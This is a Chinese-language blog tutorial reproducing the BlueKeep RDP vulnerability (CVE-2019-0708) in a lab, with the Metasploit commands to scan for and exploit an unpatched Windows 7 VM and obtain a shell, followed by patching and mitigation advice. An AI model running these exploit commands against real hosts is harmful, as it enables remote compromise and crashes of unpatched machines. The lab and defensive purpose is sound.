欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

最详细利用kali的msf进行CVE-2019-0708漏洞复现

程序员文章站 2022-05-18 23:12:46
...

CVE-2019-0708

技术无罪,请勿用于恶意用途,出事本人不负一切责任

0.漏洞背景

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

1.影响范围

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

2.复现操作

2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)
2.1 打开kali更新msf框架
apt-get update
apt-get upgrade metaspolit-framework

最详细利用kali的msf进行CVE-2019-0708漏洞复现
下载可能会慢点,耐心等待即可

2.2 打开msf,并搜索0708
msfconsole
search 0708
usre

最详细利用kali的msf进行CVE-2019-0708漏洞复现

2.3 使用扫描模块(scanner)
use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run

最详细利用kali的msf进行CVE-2019-0708漏洞复现
最详细利用kali的msf进行CVE-2019-0708漏洞复现
如果发现箭头指向的这段话证明目标主机存在0708漏洞,可以利用

2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
show targets //选择目标主机类型  这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run

最详细利用kali的msf进行CVE-2019-0708漏洞复现

最详细利用kali的msf进行CVE-2019-0708漏洞复现
如果出现上述错误 再run几次

最详细利用kali的msf进行CVE-2019-0708漏洞复现
如果出现这个,证明已经成功了
直接敲命令就行了,复现成功
最详细利用kali的msf进行CVE-2019-0708漏洞复现

可能会出现蓝屏,听说msf的利用已经停稳了,我是没有蓝屏。。

3.防御措施

3.0 及时安装微软发布的安全更新补丁:

Microsoft官方已经在2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

以及为已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

3.1缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案):

若用户不需要用到远程桌面服务,建议禁用该服务。

开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。

以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新。